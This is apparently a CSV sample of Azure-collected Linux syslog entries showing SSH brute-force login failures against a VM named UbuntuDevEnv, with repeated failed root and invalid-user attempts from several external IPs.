+14280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:48,UbuntuDevEnv,2019-06-26 04:56:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:49,UbuntuDevEnv,2019-06-26 04:56:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37508 ssh2,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37508,,
+14282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:50,UbuntuDevEnv,2019-06-26 04:56:50,auth,UbuntuDevEnv,info,Failed password for invalid user nagios3 from 200.6.188.38 port 14830 ssh2,3253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios3,200.6.188.3,14830,,
+14283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:51,UbuntuDevEnv,2019-06-26 04:56:50,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 14830:11: Bye Bye [preauth],3253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,14830,,
+14284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:51,UbuntuDevEnv,2019-06-26 04:56:50,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios3 200.6.188.38 port 14830 [preauth],3253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios3,200.6.188.3,14830,,
+14285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:52,UbuntuDevEnv,2019-06-26 04:56:52,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37508 ssh2,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37508,,
+14286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:55,UbuntuDevEnv,2019-06-26 04:56:54,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 37508: Too many authentication failures [preauth],3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,37508,,
+14287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:55,UbuntuDevEnv,2019-06-26 04:56:54,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:55,UbuntuDevEnv,2019-06-26 04:56:54,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 37508 ssh2 [preauth],3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37508,,
+14289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:55,UbuntuDevEnv,2019-06-26 04:56:54,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:55,UbuntuDevEnv,2019-06-26 04:56:54,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37508 ssh2,3223,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37508,,
+14291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:56:58,UbuntuDevEnv,2019-06-26 04:56:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:00,UbuntuDevEnv,2019-06-26 04:57:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43106 ssh2,3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43106,,
+14293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:03,UbuntuDevEnv,2019-06-26 04:57:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43106 ssh2,3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43106,,
+14294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:05,UbuntuDevEnv,2019-06-26 04:57:04,auth,UbuntuDevEnv,info,Invalid user wp-user from 196.41.208.238 port 45688,3314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,196.41.208.2,45688,,
+14295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:05,UbuntuDevEnv,2019-06-26 04:57:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,3314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:05,UbuntuDevEnv,2019-06-26 04:57:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:05,UbuntuDevEnv,2019-06-26 04:57:05,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43106 ssh2,3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43106,,
+14298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:06,UbuntuDevEnv,2019-06-26 04:57:06,auth,UbuntuDevEnv,info,Failed password for invalid user wp-user from 196.41.208.238 port 45688 ssh2,3314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,196.41.208.2,45688,,
+14299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:06,UbuntuDevEnv,2019-06-26 04:57:06,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 45688:11: Bye Bye [preauth],3314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,45688,,
+14300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:06,UbuntuDevEnv,2019-06-26 04:57:06,auth,UbuntuDevEnv,info,Disconnected from invalid user wp-user 196.41.208.238 port 45688 [preauth],3314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wp,196.41.208.2,45688,,
+14301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:08,UbuntuDevEnv,2019-06-26 04:57:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43106 ssh2,3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43106,,
+14302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:14,UbuntuDevEnv,2019-06-26 04:57:14,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 43106: Too many authentication failures [preauth],3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,43106,,
+14303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:14,UbuntuDevEnv,2019-06-26 04:57:14,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 43106 ssh2 [preauth],3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43106,,
+14304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:14,UbuntuDevEnv,2019-06-26 04:57:14,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:14,UbuntuDevEnv,2019-06-26 04:57:14,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 43106 ssh2],3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43106,,
+14306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:14,UbuntuDevEnv,2019-06-26 04:57:14,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:15,UbuntuDevEnv,2019-06-26 04:57:14,auth,UbuntuDevEnv,info,Invalid user minecraft from 177.23.90.10 port 42732,3351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,177.23.90.1,42732,,
+14308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:15,UbuntuDevEnv,2019-06-26 04:57:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:15,UbuntuDevEnv,2019-06-26 04:57:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,3351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:17,UbuntuDevEnv,2019-06-26 04:57:17,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 177.23.90.10 port 42732 ssh2,3351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,177.23.90.1,42732,,
+14311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:17,UbuntuDevEnv,2019-06-26 04:57:17,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 42732:11: Bye Bye [preauth],3351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,42732,,
+14312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:17,UbuntuDevEnv,2019-06-26 04:57:17,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 177.23.90.10 port 42732 [preauth],3351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,177.23.90.1,42732,,
+14313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:17,UbuntuDevEnv,2019-06-26 04:57:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:19,UbuntuDevEnv,2019-06-26 04:57:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49016 ssh2,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49016,,
+14315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:22,UbuntuDevEnv,2019-06-26 04:57:21,auth,UbuntuDevEnv,info,Invalid user fd from 5.135.161.72 port 57402,3390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fd,5.135.161.7,57402,,
+14316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:22,UbuntuDevEnv,2019-06-26 04:57:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49016 ssh2,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49016,,
+14317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:22,UbuntuDevEnv,2019-06-26 04:57:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,3390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:22,UbuntuDevEnv,2019-06-26 04:57:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:24,UbuntuDevEnv,2019-06-26 04:57:24,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49016 ssh2,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49016,,
+14320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:25,UbuntuDevEnv,2019-06-26 04:57:24,auth,UbuntuDevEnv,info,Failed password for invalid user fd from 5.135.161.72 port 57402 ssh2,3390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fd,5.135.161.7,57402,,
+14321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:25,UbuntuDevEnv,2019-06-26 04:57:24,auth,UbuntuDevEnv,info,Disconnected from invalid user fd 5.135.161.72 port 57402 [preauth],3390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fd,5.135.161.7,57402,,
+14322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:25,UbuntuDevEnv,2019-06-26 04:57:24,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 57402:11: Bye Bye [preauth],3390,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,57402,,
+14323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:27,UbuntuDevEnv,2019-06-26 04:57:26,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49016 ssh2,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49016,,
+14324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:28,UbuntuDevEnv,2019-06-26 04:57:28,auth,UbuntuDevEnv,info,Invalid user ts42424 from 95.216.195.95 port 51166,3412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts42424,95.216.195.9,51166,,
+14325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:28,UbuntuDevEnv,2019-06-26 04:57:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,3412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+14326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:28,UbuntuDevEnv,2019-06-26 04:57:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:30,UbuntuDevEnv,2019-06-26 04:57:29,auth,UbuntuDevEnv,info,Failed password for invalid user ts42424 from 95.216.195.95 port 51166 ssh2,3412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts42424,95.216.195.9,51166,,
+14328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:30,UbuntuDevEnv,2019-06-26 04:57:29,auth,UbuntuDevEnv,info,Disconnected from invalid user ts42424 95.216.195.95 port 51166 [preauth],3412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts42424,95.216.195.9,51166,,
+14329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:30,UbuntuDevEnv,2019-06-26 04:57:29,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 51166:11: Bye Bye [preauth],3412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,51166,,
+14330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:30,UbuntuDevEnv,2019-06-26 04:57:29,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49016 ssh2,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49016,,
+14331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:33,UbuntuDevEnv,2019-06-26 04:57:32,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:33,UbuntuDevEnv,2019-06-26 04:57:32,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49016 ssh2,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49016,,
+14333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:33,UbuntuDevEnv,2019-06-26 04:57:32,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 49016: Too many authentication failures [preauth],3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,49016,,
+14334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:33,UbuntuDevEnv,2019-06-26 04:57:32,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 49016 ssh2 [preauth],3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49016,,
+14335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:33,UbuntuDevEnv,2019-06-26 04:57:32,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3366,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:36,UbuntuDevEnv,2019-06-26 04:57:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:38,UbuntuDevEnv,2019-06-26 04:57:37,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 54512 ssh2,3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54512,,
+14338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:46,UbuntuDevEnv,2019-06-26 04:57:42,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 54512 ssh2],3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54512,,
+14339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:57:46,UbuntuDevEnv,2019-06-26 04:57:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 54512 ssh2,3433,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54512,,
